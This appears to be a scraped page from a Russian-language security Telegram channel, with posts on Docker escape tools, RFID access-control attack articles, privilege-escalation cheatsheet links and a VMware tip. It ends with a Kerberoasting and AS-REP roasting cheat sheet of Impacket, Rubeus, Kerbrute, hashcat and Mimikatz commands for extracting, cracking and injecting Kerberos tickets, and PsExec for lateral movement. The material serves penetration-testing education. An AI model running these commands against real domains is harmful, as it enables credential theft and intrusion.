Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Инструменты для поиска проблем в докере 💻

На каждом собеседовании заходит речь про докеры. "Что это?", "Как их использовать?", "Зачем нужны?" и самое главное, — "Как из них выходить?". Есть множество способов, которые можно найти на hacktricks, но сегодня разговор зайдет про инструментарий.

Мне, как нынешнему DevSecOps-у удалось потыкать несколько видов развёртывания инструментов в нем. Я сейчас строю процесс на Gitlab Ci\Cd и у его раннера есть возможность работать как в обычном докере, так и в его "улучшенной" версии.

💻 Docker
Возможен запуск с привилегиями (обычно от этого и отталкиваемся)

💻 Docker in docker
Всегда запущен с привилегиями

💻 Kaniko (dind от Google), buildah, umoci, img
Всегда запущен с привилегиями

🔵 Инструменты Automatic Enumeration/Escape

🌐 deepce — Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE);
🌐 CDK — инструментарий для проникновения в контейнеры с открытым исходным кодом, предназначенный для обеспечения стабильной эксплуатации в различных тонких контейнерах без зависимости от ОС;
🌐 grype — cканер уязвимостей для образов контейнеров и файловых систем;
🌐 LinPEAS — да, у него есть замечательная функция работы с контейнерами;
🌐 dive — инструмент для изучения образа docker, содержимого слоев и поиска способов уменьшения размера образа Docker/OCI.

#opensource #devsecops #blueteam #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
10
С таких мемов надо сдувать пыль
🔥29😎2
👍38🌚9👾5👏1
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ СКУД. Поломай меня полностью.
Сегодня хочу с вами поделиться двуми прекрасными статьями про атаки на СКУД с помощью NFC и RFID.
#nfc #rfid #xakep #физика

NFC глазами хакера. Разбираем атаки на СКУД системы Mifare
Ког­да прос­тых иден­тифика­торов для кон­тро­ля дос­тупа ста­новит­ся недос­таточ­но, мно­гие дума­ют о внед­рении более совер­шенно­го решения — Mifare. Но так ли эти устрой­ства безопас­ны, как обе­щает про­изво­дитель? Поп­робу­ем разоб­рать­ся!

СКУД глазами хакера. Атакуем системы контроля доступа на основе RFID
Взлом элек­трон­ных тур­никетов на вхо­де в зда­ние — завет­ный хакер­ский флекс, который так любят показы­вать в кино. В этой статье я рас­ска­жу о сис­темах кон­тро­ля и управле­ния дос­тупом (СКУД) на осно­ве RFID, и мы вмес­те раз­берем­ся, нас­коль­ко прос­то под­делать самый рас­простра­нен­ный иден­тифика­тор EM4100.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥211
Media is too big
VIEW IN TELEGRAM
КиберПолигон в КиберДоме

Ждём Standoff 101, Talks, Hacks

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤‍🔥4🔥3
Админ делает посты для подписчиков
#halloween
❤‍🔥16🫡43🆒2
🎃 Patch or BOO!
#halloween
Please open Telegram to view this post
VIEW IN TELEGRAM
13🔥5👍3
Forwarded from BI.ZONE Bug Bounty
🪲 Миру багбаунти нужны новые герои: приглашаем студентов на Bug Bounty Cup

Если вы учитесь в техническом вузе и интересуетесь кибеберзом, участвуйте в Bug Bounty Cup — онлайн-соревновании по багхантингу, которое мы проводим вместе с «Тинькофф».

Ваша задача — обнаружить как можно больше уязвимостей. За каждую успешную находку вас ждут денежные призы и не только.

Перед стартом мы проведем вводный инструктаж, как искать баги.

Соревнование пройдет 28 ноября — успейте подать заявку на участие до 26-го.

Узнать подробности и зарегистрироваться
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
9
This media is not supported in your browser
VIEW IN TELEGRAM
⌨️ Ключи от королевства: как заполучить всю власть в Linux, Windows и macOS
#windows #linux #macos #LPE #privesc

Я думаю многие из нас слышали про GTFOBins — cheatsheet по повышению привилегий в Linux. Но что же делать, если вы попали на Windows или MacOS?

💻 Для Windows

1. LOLBAS — аналог GTFOBins только для Windows
2. LOLDrivers — cheatsheet по уязвимым драйверам Windows

🍏 Для MacOS

1. LOOBins — тут собрано множество тем, таких как разведка, закрепление, повышение привилегий, обход средств защиты и т.д.

💻Для Linux

1. GTFOArgs — тот случай, когда даже GTFOBins не хватает, то вы всё ещё можете попробовать сделать PrivEsc через аргументы к различными командам.

📌 Также от себя добавлю интересный сборник команд, который поможет вам быстро вспомнить как пентестить AD — WADComs и ARTToolkit. А тут ещё пригодится AD Pentest MindMap из моего сборника ресурсов в закрепе.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
128👍3🔥2
Завтра будет что-то интересное 🌚
🔥9❤‍🔥7👀3👍2
#заметка

если у вас не работает буфер обмена или drag&drop на бубунте в VMware, то попробуйте следующие методы:

1. Установите VMware Tools, следуя обычному методу (Виртуальная машина —> Переустановить VMWare Tools)
1.1. Если автоматическая установка не началась, то либо переходим к пункту 2, либо вручную попробуйте установить. Копируем архив с подключившегося iso, распаковываем командой tar xvfz *.tar.gz и запускаем скрипт sudo ./vmware-install.pl. Можно везде тыкать Enter.
2. Если первый вариант не прокатил, то попробуйте sudo apt install open-vm-tools-desktop
9👍73
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
#Windows

Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.

➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec

➡️ ASREP-Roast

➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

➡️ Rubeus
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

➡️ Cracking
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt


Linux
``bash
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou
``


➡️ Brute Force

➡️ Kerbrute
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>

➡️ Rubeus
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>

Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>

➡️ Kerberoasting

➡️ Impacket
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request


➡️ Rubeus
Kerberoast всех пользователей домена
.\Rubeus kerberoast

Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local

Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVC

➡️ Pass-The-Ticket

➡️ Mimikatz
Сбор тикетов
sekurlsa::tickets /export

Инжект тикета
kerberos::ptt <.kirbi file>

Создать CMD с инжектированным тикетом
misc::cmd

➡️ Rubeus
Дамп тикетов
.\Rubeus.exe dump

Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>

➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmd

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23🔥21